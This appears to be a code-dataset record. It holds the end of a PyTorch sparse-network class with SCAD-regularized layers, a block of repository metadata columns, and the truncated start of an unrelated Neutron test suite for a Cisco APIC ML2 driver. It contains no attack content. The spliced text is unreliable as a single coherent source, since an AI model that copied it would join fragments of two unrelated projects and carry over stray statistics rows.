                 group_relaxed_SCAD_Conv2d(conv_dims[0], conv_dims[1], 5, droprate_init=0.5, temperature=temperature,
                                           weight_decay=self.weight_decay, lamba=lambas[1], beta=beta, local_rep=local_rep),
                 nn.ReLU(), nn.MaxPool2d(2)]
        self.convs = nn.Sequential(*convs)
        if torch.cuda.is_available():
            self.convs = self.convs.cuda()
        # Flattened feature size after the conv stack, probed with a dummy pass.
        flat_fts = get_flat_fts(input_size, self.convs)
        fcs = [group_relaxed_SCAD_Dense(flat_fts, self.fc_dims, droprate_init=0.5, weight_decay=self.weight_decay,
                                        lamba=lambas[2], beta=beta, local_rep=local_rep, temperature=temperature), nn.ReLU(),
               group_relaxed_SCAD_Dense(self.fc_dims, num_classes, droprate_init=0.5, weight_decay=self.weight_decay,
                                        lamba=lambas[3], beta=beta, local_rep=local_rep, temperature=temperature)]
        self.fcs = nn.Sequential(*fcs)
        # Only the regularized layers take part in penalty/sparsity queries.
        self.layers = []
        for m in self.modules():
            if isinstance(m, group_relaxed_SCAD_Dense) or isinstance(m, group_relaxed_SCAD_Conv2d):
                self.layers.append(m)
        if beta_ema > 0.:
            print('Using temporal averaging with beta: {}'.format(beta_ema))
            self.avg_param = deepcopy(list(p.data for p in self.parameters()))
            if torch.cuda.is_available():
                self.avg_param = [a.cuda() for a in self.avg_param]
            self.steps_ema = 0.

    def forward(self, x):
        o = self.convs(x)
        o = o.view(o.size(0), -1)
        return self.fcs(o)

    def regularization(self):
        """Total penalty over regularized layers, scaled by 1/N (negated per-layer term)."""
        regularization = 0.
        for layer in self.layers:
            regularization += - (1. / self.N) * layer.regularization()
        if torch.cuda.is_available():
            regularization = regularization.cuda()
        return regularization

    def get_exp_flops_l0(self):
        """Expected FLOPs and expected L0, summed over layers that support the count."""
        expected_flops, expected_l0 = 0., 0.
        for layer in self.layers:
            try:
                e_fl, e_l0 = layer.count_expected_flops_and_l0()
                expected_flops += e_fl
                expected_l0 += e_l0
            except Exception:  # best-effort; was a bare except
                pass
        return expected_flops, expected_l0

    def update_ema(self):
        """EMA step: avg <- beta*avg + (1-beta)*param (requires beta_ema > 0)."""
        self.steps_ema += 1
        for p, avg_p in zip(self.parameters(), self.avg_param):
            avg_p.mul_(self.beta_ema).add_((1 - self.beta_ema) * p.data)

    def load_ema_params(self):
        """Copy bias-corrected EMA parameters into the live parameters."""
        for p, avg_p in zip(self.parameters(), self.avg_param):
            p.data.copy_(avg_p / (1 - self.beta_ema ** self.steps_ema))

    def load_params(self, params):
        """Copy the given tensors into the model parameters, position-wise."""
        for p, avg_p in zip(self.parameters(), params):
            p.data.copy_(avg_p)

    def get_params(self):
        """Return a deep-copied snapshot of all parameter tensors."""
        params = deepcopy(list(p.data for p in self.parameters()))
        return params

    def get_w_sparsity(self):
        """Fraction of zero-valued weights across all regularized layers."""
        sparsity_num = 0.
        sparsity_denom = 0.
        for layer in self.layers:
            sparsity_num += layer.count_zero_w()
            sparsity_denom += layer.count_weight()
        return sparsity_num / sparsity_denom

    def count_active_neuron(self):
        """Total active neurons over all regularized layers."""
        neuron = 0
        for layer in self.layers:
            neuron += layer.count_active_neuron()
        return neuron

    def count_total_neuron(self):
        """Total neuron count over layers of the counted types."""
        neuron = 0
        for layer in self.layers:
            if isinstance(layer, (group_relaxed_SCAD_Dense, MAPConv2d, group_relaxed_SCAD_Conv2d)):
                neuron += layer.count_total_neuron()
        return neuron

    def count_reg_neuron_sparsity(self):
        """Fraction of regularized-layer neurons that are inactive."""
        neuron = 0
        total = 0
        for layer in self.layers:
            if isinstance(layer, (group_relaxed_SCAD_Conv2d, group_relaxed_SCAD_Dense)):
                neuron += layer.count_active_neuron()
                total += layer.count_total_neuron()
        return 1 - neuron / total
| 39.017946
| 139
| 0.605775
| 5,210
| 39,135
| 4.294434
| 0.027063
| 0.043265
| 0.022124
| 0.02704
| 0.975954
| 0.95754
| 0.954188
| 0.951327
| 0.948914
| 0.932332
| 0
| 0.028401
| 0.288335
| 39,135
| 1,002
| 140
| 39.056886
| 0.774945
| 0
| 0
| 0.889831
| 0
| 0
| 0.007768
| 0
| 0
| 0
| 0
| 0
| 0.009685
| 1
| 0.124697
| false
| 0.009685
| 0.009685
| 0
| 0.230024
| 0.010896
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7eff221a882cc562deac349423b1db1f562605ec
| 267,578
|
py
|
Python
|
apic_ml2/neutron/tests/unit/ml2/drivers/cisco/apic/test_cisco_apic_mechanism_driver.py
|
noironetworks/apic-ml2-driver
|
9093d766d2e17ceccf948bc51e2963d655ce4f37
|
[
"Apache-2.0"
] | 8
|
2015-06-12T09:41:29.000Z
|
2021-02-19T05:41:39.000Z
|
apic_ml2/neutron/tests/unit/ml2/drivers/cisco/apic/test_cisco_apic_mechanism_driver.py
|
noironetworks/apic-ml2-driver
|
9093d766d2e17ceccf948bc51e2963d655ce4f37
|
[
"Apache-2.0"
] | 57
|
2015-09-12T07:19:34.000Z
|
2020-02-11T12:57:54.000Z
|
apic_ml2/neutron/tests/unit/ml2/drivers/cisco/apic/test_cisco_apic_mechanism_driver.py
|
noironetworks/apic-ml2-driver
|
9093d766d2e17ceccf948bc51e2963d655ce4f37
|
[
"Apache-2.0"
] | 12
|
2015-10-13T12:29:12.000Z
|
2019-04-10T08:09:54.000Z
|
# Copyright (c) 2014 Cisco Systems
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import copy
import hashlib
import hmac
import re
import sys
import tempfile
from apicapi import apic_client
from apicapi import apic_manager
from apicapi import apic_mapper
import mock
import netaddr
from neutron.api import extensions
from neutron.common import constants as n_constants
from neutron import context
from neutron.db import api as db_api
from neutron.db import db_base_plugin_v2 # noqa
from neutron.db import models_v2 # noqa
from neutron.extensions import portbindings
from neutron import manager
from neutron.plugins.ml2 import db as ml2_db
from neutron.plugins.ml2 import driver_api as api
from neutron.plugins.ml2 import driver_context
from neutron.plugins.ml2.drivers import type_vlan # noqa
from neutron.tests.unit.api import test_extensions
from neutron.tests.unit.db import test_db_base_plugin_v2 as test_plugin
from neutron.tests.unit import testlib_api
from opflexagent import constants as ofcst
from oslo_serialization import jsonutils as json
# Mock the opflex agent type driver, and its constants,
# so that we can test port binding to opflex networks
T_DRV = "opflexagent.type_opflex"
# Replace the whole opflexagent package with a Mock before anything imports it.
sys.modules["opflexagent"] = mock.Mock()
sys.modules["opflexagent"].constants.TYPE_OPFLEX = 'opflex'
sys.modules["opflexagent"].constants.AGENT_TYPE_OPFLEX_OVS = (
    'OpFlex Open vSwitch agent')
# Stub the type driver module; tenant segments always come out as an
# 'opflex' network on 'physnet1'.
sys.modules[T_DRV] = mock.Mock()
sys.modules[T_DRV].OpflexTypeDriver().get_type.return_value = 'opflex'
sys.modules[T_DRV].OpflexTypeDriver().allocate_tenant_segment.return_value = (
    {api.NETWORK_TYPE: ofcst.TYPE_OPFLEX,
     api.PHYSICAL_NETWORK: 'physnet1'})
from apic_ml2.neutron.db import port_ha_ipaddress_binding as ha
from apic_ml2.neutron.plugins.ml2.drivers.cisco.apic import (
extension_db as extn_db)
from apic_ml2.neutron.plugins.ml2.drivers.cisco.apic import (
mechanism_apic as md)
from apic_ml2.neutron.plugins.ml2.drivers.cisco.apic import (
rpc as mech_rpc)
from apic_ml2.neutron.plugins.ml2.drivers.cisco.apic import constants as acst
from apic_ml2.neutron.services.l3_router import apic_driver as driver
from apic_ml2.neutron.tests.unit.ml2.drivers.cisco.apic import (
test_cisco_apic_common as mocked)
# Point the mocked apicapi manager's external EPG at the shared test fixture.
sys.modules["apicapi"].apic_manager.EXT_EPG = mocked.APIC_EXT_EPG
# Fixture constants shared by the test cases below.
HOST_ID1 = 'ubuntu'
HOST_ID2 = 'rhel'
ENCAP = '101'
SUBNET_GATEWAY = '10.3.2.1'
SUBNET_CIDR = '10.3.1.0/24'
SUBNET_NETMASK = '24'
TEST_SEGMENT1 = 'test-segment1'
TEST_SEGMENT2 = 'test-segment2'
BOOKED_PORT_VALUE = 'myBookedPort'
PLUGIN_NAME = 'neutron.plugins.ml2.plugin.Ml2Plugin'
# Canned agent registration payloads for the OVS, DVS and OpFlex agent types.
AGENT_TYPE = n_constants.AGENT_TYPE_OVS
AGENT_CONF = {'alive': True, 'binary': 'somebinary',
              'topic': 'sometopic', 'agent_type': AGENT_TYPE,
              'configurations': {'opflex_networks': None,
                                 'bridge_mappings': {'physnet1': 'br-eth1'}}}
AGENT_TYPE_DVS = acst.AGENT_TYPE_DVS
AGENT_CONF_DVS = {'alive': True, 'binary': 'anotherbinary',
                  'topic': 'anothertopic', 'agent_type': AGENT_TYPE_DVS,
                  'configurations': {'opflex_networks': None}}
AGENT_CONF_OPFLEX = {'alive': True, 'binary': 'somebinary',
                     'topic': 'sometopic',
                     'agent_type': ofcst.AGENT_TYPE_OPFLEX_OVS,
                     'configurations': {
                         'opflex_networks': None,
                         'bridge_mappings': {'physnet1': 'br-eth1'}}}
APIC_EXTERNAL_RID = '1.0.0.1'
TEST_TENANT = test_plugin.TEST_TENANT_ID
# Extension attribute names used by the APIC ML2 driver.
ALLOW_ROUTE_LEAK = 'apic:allow_route_leak'
USE_ROUTING_CONTEXT = 'apic:use_routing_context'
def echo(context, id, prefix=''):
    """Name-mapper stub: return *id* as-is, or prepended with *prefix* if given."""
    if prefix:
        return prefix + id
    return id
def name(name):
    # Identity stub used to replace APIC managed-object name lookups in tests.
    return name
def equal(x, y):
    """True when *x* and *y* have identical string representations.

    Patched in as ApicName.__eq__ so mapped names compare by value in tests.
    """
    left = str(x)
    right = str(y)
    return left == right
class ApicML2IntegratedTestBase(test_plugin.NeutronDbPluginV2TestCase,
                                mocked.ControllerMixin, mocked.ConfigMixin,
                                mocked.ApicDBTestBase):
    """Shared fixture for APIC ML2 mechanism-driver integration tests.

    Boots a real ML2 plugin with the cisco_apic_ml2 mechanism driver while
    mocking the apicapi client/manager layer, then exposes shorthand helpers
    for registering agents, binding ports and querying endpoint details.
    """

    _extension_drivers = ['port_security', 'apic_ml2']

    def setUp(self, service_plugins=None, ml2_opts=None):
        """Wire up config overrides, apicapi mocks and the ML2 plugin.

        NOTE(review): statement order matters here — mocks and config must be
        in place before the plugin is instantiated by super().setUp().
        """
        mocked.ControllerMixin.set_up_mocks(self)
        mocked.ConfigMixin.set_up_mocks(self, ml2_opts=ml2_opts)
        self.override_conf('integrated_topology_service', True,
                           'ml2_cisco_apic')
        self.override_conf('per_tenant_context', False,
                           'ml2_cisco_apic')
        self.override_conf('extension_drivers',
                           self._extension_drivers,
                           group='ml2')
        # MTU settings verified later by the endpoint-details tests.
        self.override_conf('path_mtu', 1000, group='ml2')
        self.override_conf('global_physnet_mtu', 1000)
        self.override_conf('advertise_mtu', True, None)
        service_plugins = (
            service_plugins or
            {'L3_ROUTER_NAT': 'apic_ml2.neutron.services.l3_router.'
             'l3_apic.ApicL3ServicePlugin',
             'flavors_plugin_name': 'neutron.services.flavors.'
             'flavors_plugin.FlavorsPlugin'})
        # Keep the driver from reaching out to Nova or a real APIC.
        mock.patch('apic_ml2.neutron.plugins.ml2.drivers.'
                   'cisco.apic.nova_client.NovaClient').start()
        apic_client.RestClient = mock.Mock()
        apic_manager.APICManager.ensure_infra_created_on_apic = mock.Mock()
        apic_manager.APICManager.ensure_bgp_pod_policy_created_on_apic = (
            mock.Mock())
        # Compare mapped names by string value (see module-level equal()).
        apic_mapper.ApicName.__eq__ = equal
        super(ApicML2IntegratedTestBase, self).setUp(
            PLUGIN_NAME, service_plugins=service_plugins)
        ext_mgr = extensions.PluginAwareExtensionManager.get_instance()
        self.ext_api = test_extensions.setup_extensions_middleware(ext_mgr)
        self.plugin.remove_networks_from_down_agents = mock.Mock()
        self.plugin.is_agent_down = mock.Mock(return_value=False)
        self.driver = self.plugin.mechanism_manager.mech_drivers[
            'cisco_apic_ml2'].obj
        self.synchronizer = mock.Mock()
        md.importutils = mock.Mock()
        md.APICMechanismDriver.get_base_synchronizer = mock.Mock(
            return_value=self.synchronizer)
        self.driver.name_mapper.aci_mapper.tenant = echo
        self.driver.apic_manager.apic = mock.Mock()
        self.driver.apic_manager.apic.transaction = self.fake_transaction
        self.rpc = self.driver.topology_endpoints[0]
        self.db = self.driver.apic_manager.db
        # Pre-populate host links from the mixin-provided switch topology.
        for switch in self.switch_dict:
            for module_port in self.switch_dict[switch]:
                module, port = module_port.split('/', 1)
                hosts = self.switch_dict[switch][module_port]
                for host in hosts:
                    self.driver.apic_manager.add_hostlink(
                        host, 'static', None, switch, module, port)
        self.mgr = self.driver.apic_manager
        self.mgr.apic.fvTenant.name = name
        self.mgr.apic.fvCtx.name = name
        self.l3_plugin = manager.NeutronManager.get_service_plugins()[
            'L3_ROUTER_NAT']
        self.driver.apic_manager.vmm_shared_secret = base64.b64encode(
            'dirtylittlesecret')
        self.driver.notifier = mock.Mock()
        self.driver._query_external_EPG = mock.Mock()
        self.driver._query_external_EPG.return_value = ['5.5.5.0/24',
                                                        '6.6.6.0/24']

    def _mock_external_dict(self, data, is_edge_nat=False):
        """Replace the manager's ext_net_dict with entries built from *data*
        ((name, cidr) pairs)."""
        self.driver.apic_manager.ext_net_dict = {}
        for x in data:
            self.driver.apic_manager.ext_net_dict.update(
                self._build_external_dict(x[0], x[1], is_edge_nat=is_edge_nat))

    def _build_external_dict(self, name, cidr_exposed, nat_enabled=True,
                             is_edge_nat=False):
        """Build one external-network config entry keyed by *name*."""
        ext_info = {
            'enable_nat': 'True' if nat_enabled else 'False'
        }
        ext_info.update({
            'switch': mocked.APIC_EXT_SWITCH,
            'port': mocked.APIC_EXT_MODULE + '/' + mocked.APIC_EXT_PORT,
            'encap': mocked.APIC_EXT_ENCAP,
            'router_id': APIC_EXTERNAL_RID,
            # Gateway is the first usable address of the exposed CIDR.
            'gateway_ip': str(netaddr.IPNetwork(cidr_exposed)[1]),
            'cidr_exposed': cidr_exposed})
        if is_edge_nat:
            ext_info['edge_nat'] = 'true'
            ext_info['vlan_range'] = '2000:2010'
        return {name: ext_info}

    def _register_agent(self, host, agent_cfg=AGENT_CONF):
        """Register (or refresh) an L2 agent on *host* with the given config."""
        plugin = manager.NeutronManager.get_plugin()
        ctx = context.get_admin_context()
        agent = {'host': host}
        agent.update(agent_cfg)
        plugin.create_or_update_agent(ctx, agent)

    def _bind_port_to_host(self, port_id, host):
        """Bind *port_id* to *host* as a compute port; returns the updated port."""
        data = {'port': {'binding:host_id': host,
                         'device_owner': 'compute:',
                         'device_id': 'someid'}}
        # Create EP with bound port
        req = self.new_update_request('ports', data, port_id,
                                      self.fmt)
        return self.deserialize(self.fmt, req.get_response(self.api))

    def _bind_dhcp_port_to_host(self, port_id, host):
        """Bind *port_id* to *host* as a DHCP port; returns the updated port."""
        data = {'port': {'binding:host_id': host,
                         'device_owner': 'network:dhcp',
                         'device_id': 'someid'}}
        # Create EP with bound port
        req = self.new_update_request('ports', data, port_id,
                                      self.fmt)
        return self.deserialize(self.fmt, req.get_response(self.api))

    def _check_call_list(self, expected, observed):
        """Assert *observed* mock calls equal *expected*, order-insensitively.

        fixed_ips IP addresses are blanked on both sides so the comparison
        ignores whichever address the IPAM happened to allocate.
        """
        for obs in observed:
            if len(obs[0]) > 1 and type(obs[0][1]) is dict and (
                    'fixed_ips' in obs[0][1]):
                obs[0][1]['fixed_ips'][0]['ip_address'] = ''
        for call in expected:
            if len(call[1]) > 1 and type(call[1][1]) is dict and (
                    'fixed_ips' in call[1][1]):
                call[1][1]['fixed_ips'][0]['ip_address'] = ''
            self.assertTrue(call in observed,
                            msg='Call not found, expected:\n%s\nobserved:'
                                '\n%s' % (str(call), str(observed)))
            observed.remove(call)
        self.assertFalse(
            len(observed),
            msg='There are more calls than expected: %s' % str(observed))

    def _add_hosts_to_apic(self, num, vpc=False):
        """Add *num* hosts (h1..hN) with host links; two links each when vpc."""
        for x in range(1, num + 1):
            self.db.add_hostlink(
                'h%s' % x, 'eth0' if vpc else 'static', None, str(x),
                '1', str(x))
            if vpc:
                self.db.add_hostlink(
                    'h%s' % x, 'eth1', None, str(x + 1), '1', str(x))
        self.rpc.peers = self.rpc._load_peers()

    def _get_gbp_details(self, port_id, host):
        """Fetch GBP endpoint details for the tap device of *port_id* on *host*."""
        return self.driver.get_gbp_details(
            context.get_admin_context(),
            device='tap%s' % port_id, host=host)

    def _request_endpoint_details(self, port_id, host, timestamp=None,
                                  request_id=None):
        """Issue a request_endpoint_details RPC for *port_id* on *host*."""
        return self.driver.request_endpoint_details(
            context.get_admin_context(),
            request={'device': 'tap%s' % port_id, 'timestamp': 0,
                     'request_id': 'request_id'}, host=host)

    def _check_ip_in_cidr(self, ip_addr, cidr):
        """Assert *ip_addr* falls inside *cidr*."""
        self.assertTrue(netaddr.IPAddress(ip_addr) in netaddr.IPNetwork(cidr))
class ApicML2IntegratedTestCase(ApicML2IntegratedTestBase):
def test_network_visibility(self):
    """A non-shared network is visible to its owner and admin, not to others."""
    net = self.create_network(tenant_id='onetenant',
                              expected_res_status=201)['network']
    # Visible by onetenant
    self.show_network(net['id'], tenant_id='onetenant',
                      expected_res_status=200)
    # Not visible by anothertenant
    self.show_network(net['id'], tenant_id='anothertenant',
                      expected_res_status=404)
    # Visible by admintenant
    self.show_network(net['id'], tenant_id='admintenant',
                      is_admin_context=True, expected_res_status=200)
def test_shared_network_visibility(self):
    """A shared network is visible to every tenant, including non-owners."""
    net = self.create_network(
        tenant_id='onetenant', expected_res_status=201, shared=True,
        is_admin_context=True)['network']
    # Visible by onetenant
    self.show_network(net['id'], tenant_id='onetenant',
                      expected_res_status=200)
    # Visible by anothertenant
    self.show_network(net['id'], tenant_id='anothertenant',
                      expected_res_status=200)
    # Visible by admintenant
    self.show_network(net['id'], tenant_id='admintenant',
                      is_admin_context=True, expected_res_status=200)
def test_port_on_shared_non_opflex_network(self):
    """Binding a foreign tenant's port on a shared network programs the
    static path under the network owner's APIC tenant."""
    self._register_agent('h1')
    net = self.create_network(
        tenant_id='onetenant', expected_res_status=201, shared=True,
        is_admin_context=True)['network']
    sub = self.create_subnet(
        network_id=net['id'], cidr='192.168.0.0/24',
        ip_version=4, is_admin_context=True)
    with self.port(subnet=sub, tenant_id='anothertenant') as p1:
        p1 = p1['port']
        self.assertEqual(net['id'], p1['network_id'])
        self.mgr.ensure_path_created_for_port = mock.Mock()
        # Bind port to trigger path binding
        self._bind_port_to_host(p1['id'], 'h1')
        # Called on the network's tenant
        self.mgr.ensure_path_created_for_port.assert_called_once_with(
            self._tenant(neutron_tenant='onetenant'),
            net['id'], 'h1', mock.ANY, transaction=mock.ANY,
            bd_name=None, app_profile_name=self._app_profile(
                neutron_tenant='onetenant'))
def test_port_on_shared_opflex_network(self):
    """GBP endpoint details for a port on a shared network report the network
    owner's APIC tenant/app-profile plus MTU and DHCP-lease settings."""
    self.driver.apic_optimized_dhcp_lease_time = 100
    self._register_agent('h1')
    net = self.create_network(
        tenant_id='onetenant', expected_res_status=201, shared=True,
        is_admin_context=True)['network']
    sub = self.create_subnet(
        network_id=net['id'], cidr='192.168.0.0/24',
        ip_version=4, is_admin_context=True)
    with self.port(subnet=sub, tenant_id='anothertenant') as p1:
        p1 = p1['port']
        self.assertEqual(net['id'], p1['network_id'])
        # Bind port to trigger path binding
        self._bind_port_to_host(p1['id'], 'h1')
        self.driver._add_ip_mapping_details = mock.Mock()
        details = self._get_gbp_details(p1['id'], 'h1')
        self.assertEqual(self._tenant(neutron_tenant='onetenant'),
                         details['ptg_tenant'])
        self.assertEqual(self._app_profile(neutron_tenant='onetenant'),
                         details['app_profile_name'])
        self.assertEqual('onetenant',
                         details['tenant_id'])
        self.assertTrue(details['enable_dhcp_optimization'])
        self.assertEqual(1, len(details['subnets']))
        self.assertEqual(sub['subnet']['id'], details['subnets'][0]['id'])
        # Verify Interface MTU correctly set
        self.assertEqual(1000, details['interface_mtu'])
        self.assertEqual(100, details['dhcp_lease_time'])
def test_port_security_port(self):
    """promiscuous_mode in endpoint details: compute ports are promiscuous
    only when port security is disabled; DHCP ports always are."""
    self._register_agent('h1')
    net = self.create_network(
        tenant_id='onetenant', expected_res_status=201, shared=True,
        is_admin_context=True)['network']
    self.create_subnet(
        network_id=net['id'], cidr='192.168.0.0/24',
        ip_version=4, is_admin_context=True)
    self.driver._add_ip_mapping_details = mock.Mock()
    # test compute port
    p1 = self.create_port(
        network_id=net['id'], tenant_id='onetenant',
        device_owner='compute:', device_id='someid')['port']
    self._bind_port_to_host(p1['id'], 'h1')
    details = self._get_gbp_details(p1['id'], 'h1')
    self.assertFalse(details['promiscuous_mode'])
    p2 = self.create_port(
        network_id=net['id'], tenant_id='onetenant',
        device_owner='compute:', device_id='someid',
        port_security_enabled=True)['port']
    self._bind_port_to_host(p2['id'], 'h1')
    details = self._get_gbp_details(p2['id'], 'h1')
    self.assertFalse(details['promiscuous_mode'])
    # Port security off -> promiscuous
    p3 = self.create_port(
        network_id=net['id'], tenant_id='onetenant',
        device_owner='compute:', device_id='someid',
        port_security_enabled=False)['port']
    self._bind_port_to_host(p3['id'], 'h1')
    details = self._get_gbp_details(p3['id'], 'h1')
    self.assertTrue(details['promiscuous_mode'])
    # test DHCP port
    p1_dhcp = self.create_port(
        network_id=net['id'], tenant_id='onetenant',
        device_owner=n_constants.DEVICE_OWNER_DHCP, device_id='someid')[
        'port']
    self._bind_port_to_host(p1_dhcp['id'], 'h1')
    details = self._get_gbp_details(p1_dhcp['id'], 'h1')
    self.assertTrue(details['promiscuous_mode'])
    p2_dhcp = self.create_port(
        network_id=net['id'], tenant_id='onetenant',
        device_owner=n_constants.DEVICE_OWNER_DHCP, device_id='someid',
        port_security_enabled=True)['port']
    self._bind_port_to_host(p2_dhcp['id'], 'h1')
    details = self._get_gbp_details(p2_dhcp['id'], 'h1')
    self.assertTrue(details['promiscuous_mode'])
    p3_dhcp = self.create_port(
        network_id=net['id'], tenant_id='onetenant',
        device_owner=n_constants.DEVICE_OWNER_DHCP, device_id='someid',
        port_security_enabled=False)['port']
    self._bind_port_to_host(p3_dhcp['id'], 'h1')
    details = self._get_gbp_details(p3_dhcp['id'], 'h1')
    self.assertTrue(details['promiscuous_mode'])
    def test_enhanced_subnet_options(self):
        """Verify per-subnet details reported for a bound port.

        The gbp_details subnet entry must carry the DHCP port's IP as both
        DNS nameserver and dhcp_server_ip, plus exactly two host routes:
        the default route via the gateway and the metadata route via DHCP.
        """
        self._register_agent('h1')
        net = self.create_network(
            tenant_id='onetenant', expected_res_status=201, shared=True,
            is_admin_context=True)['network']
        sub = self.create_subnet(
            network_id=net['id'], cidr='192.168.0.0/24',
            ip_version=4, is_admin_context=True)
        with self.port(subnet=sub, tenant_id='onetenant') as p1:
            with self.port(subnet=sub, device_owner='network:dhcp',
                           tenant_id='onetenant') as dhcp:
                p1 = p1['port']
                dhcp = dhcp['port']
                self.assertEqual(net['id'], p1['network_id'])
                # Bind port to trigger path binding
                self._bind_port_to_host(p1['id'], 'h1')
                self.driver._add_ip_mapping_details = mock.Mock()
                # Metadata optimization off so the metadata route is expected
                self.driver.enable_metadata_opt = False
                details = self._get_gbp_details(p1['id'], 'h1')
                self.assertEqual(1, len(details['subnets']))
                # Verify that DNS nameservers are correctly set
                self.assertEqual([dhcp['fixed_ips'][0]['ip_address']],
                                 details['subnets'][0]['dns_nameservers'])
                # Verify Default route via GW
                self.assertTrue({'destination': '0.0.0.0/0',
                                 'nexthop': '192.168.0.1'} in
                                details['subnets'][0]['host_routes'])
                # Verify Metadata route via DHCP
                self.assertTrue(
                    {'destination': '169.254.169.254/16',
                     'nexthop': dhcp['fixed_ips'][0]['ip_address']} in
                    details['subnets'][0]['host_routes'])
                # Verify no extra routes are leaking inside
                self.assertEqual(2, len(details['subnets'][0]['host_routes']))
                self.assertEqual([dhcp['fixed_ips'][0]['ip_address']],
                                 details['subnets'][0]['dhcp_server_ips'])
    def _test_vrf_details(self, vrf_per_router=False):
        """Common body for the VRF details tests.

        Builds several networks/subnets (two marked apic:allow_route_leak),
        attaches them to a router plus a second router that re-uses the
        first router's routing context, then checks the l3_policy_id,
        vrf_tenant, vrf_name and vrf_subnets reported in gbp_details for
        ports on the different networks.

        :param vrf_per_router: when True (and per_tenant_context is on),
            expect router-scoped VRF names and subnet lists.
        """
        self._register_agent('h1')
        net = self.create_network(
            tenant_id=mocked.APIC_TENANT, is_admin_context=True)['network']
        sub = self.create_subnet(
            network_id=net['id'], cidr='192.168.0.0/24',
            ip_version=4, is_admin_context=True)
        self.create_subnet(
            network_id=net['id'], cidr='192.168.2.0/24',
            ip_version=4, is_admin_context=True)
        net1 = self.create_network(
            tenant_id=mocked.APIC_TENANT, is_admin_context=True)['network']
        sub2 = self.create_subnet(
            network_id=net1['id'], cidr='192.168.4.0/24',
            ip_version=4, is_admin_context=True)
        net2 = self.create_network(
            tenant_id=mocked.APIC_TENANT, is_admin_context=True)['network']
        sub3 = self.create_subnet(
            network_id=net2['id'], cidr='192.168.6.0/24',
            ip_version=4, is_admin_context=True)
        self.create_subnet(
            network_id=net2['id'], cidr='192.168.8.0/24',
            ip_version=4, is_admin_context=True)
        # Networks allowed to leak their routes into other VRFs
        net_route_leak = self.create_network(
            tenant_id=mocked.APIC_TENANT, is_admin_context=True,
            **{'apic:allow_route_leak': 'True'})['network']
        sub_route_leak = self.create_subnet(
            network_id=net_route_leak['id'], cidr='192.168.96.0/24',
            ip_version=4, is_admin_context=True)
        net_route_leak1 = self.create_network(
            tenant_id=mocked.APIC_TENANT, is_admin_context=True,
            **{'apic:allow_route_leak': 'True'})['network']
        sub_route_leak1 = self.create_subnet(
            network_id=net_route_leak1['id'], cidr='192.168.98.0/24',
            ip_version=4, is_admin_context=True)
        router = self.create_router(api=self.ext_api,
                                    tenant_id=mocked.APIC_TENANT)['router']
        # use_routing_context router
        router1 = self.create_router(api=self.ext_api,
                                     tenant_id=mocked.APIC_TENANT,
                                     **{'apic:use_routing_context':
                                        router['id']}
                                     )['router']
        self.l3_plugin.add_router_interface(
            context.get_admin_context(), router1['id'],
            {'subnet_id': sub['subnet']['id']})
        self.l3_plugin.add_router_interface(
            context.get_admin_context(), router['id'],
            {'subnet_id': sub3['subnet']['id']})
        self.l3_plugin.add_router_interface(
            context.get_admin_context(), router1['id'],
            {'subnet_id': sub_route_leak['subnet']['id']})
        self.l3_plugin.add_router_interface(
            context.get_admin_context(), router['id'],
            {'subnet_id': sub_route_leak1['subnet']['id']})
        self.driver._add_ip_mapping_details = mock.Mock()
        # Port on a route-leak network
        with self.port(subnet=sub_route_leak,
                       tenant_id=mocked.APIC_TENANT) as p0:
            p0 = p0['port']
            self._bind_port_to_host(p0['id'], 'h1')
            details = self._get_gbp_details(p0['id'], 'h1')
            if self.driver.per_tenant_context and vrf_per_router:
                self.assertEqual(mocked.APIC_TENANT,
                                 details['l3_policy_id'])
                self.assertEqual(self._tenant(vrf=True),
                                 details['vrf_tenant'])
                self.assertEqual(self._network_vrf_name(),
                                 details['vrf_name'])
                # Only the unrouted and route-leak subnets are visible
                self.assertEqual(['192.168.4.0/24', '192.168.96.0/24',
                                  '192.168.98.0/24'],
                                 details['vrf_subnets'])
            else:
                if self.driver.per_tenant_context:
                    self.assertEqual(mocked.APIC_TENANT,
                                     details['l3_policy_id'])
                else:
                    self.assertEqual('%s-shared' % self._tenant(vrf=True),
                                     details['l3_policy_id'])
                self.assertEqual(self._tenant(vrf=True),
                                 details['vrf_tenant'])
                self.assertEqual(self._network_vrf_name(),
                                 details['vrf_name'])
                self.assertEqual(['192.168.0.0/24', '192.168.2.0/24',
                                  '192.168.4.0/24', '192.168.6.0/24',
                                  '192.168.8.0/24', '192.168.96.0/24',
                                  '192.168.98.0/24'],
                                 details['vrf_subnets'])
        # Port on a routed (non-leak) network
        with self.port(subnet=sub, tenant_id=mocked.APIC_TENANT) as p1:
            p1 = p1['port']
            self._bind_port_to_host(p1['id'], 'h1')
            details = self._get_gbp_details(p1['id'], 'h1')
            if self.driver.per_tenant_context and vrf_per_router:
                # VRF is scoped to the router owning the routing context
                self.assertEqual('router:%s' % router['id'],
                                 details['l3_policy_id'])
                self.assertEqual(self._tenant(vrf=True),
                                 details['vrf_tenant'])
                self.assertEqual(
                    self._routed_network_vrf_name(router=router['id']),
                    details['vrf_name'])
                self.assertEqual(['192.168.0.0/24', '192.168.2.0/24',
                                  '192.168.6.0/24', '192.168.8.0/24',
                                  '192.168.96.0/24', '192.168.98.0/24'],
                                 details['vrf_subnets'])
            else:
                if self.driver.per_tenant_context:
                    self.assertEqual(mocked.APIC_TENANT,
                                     details['l3_policy_id'])
                else:
                    self.assertEqual('%s-shared' % self._tenant(vrf=True),
                                     details['l3_policy_id'])
                self.assertEqual(self._tenant(vrf=True),
                                 details['vrf_tenant'])
                self.assertEqual(self._network_vrf_name(),
                                 details['vrf_name'])
                self.assertEqual(['192.168.0.0/24', '192.168.2.0/24',
                                  '192.168.4.0/24', '192.168.6.0/24',
                                  '192.168.8.0/24', '192.168.96.0/24',
                                  '192.168.98.0/24'],
                                 details['vrf_subnets'])
            # remove the router interface
            self.l3_plugin.remove_router_interface(
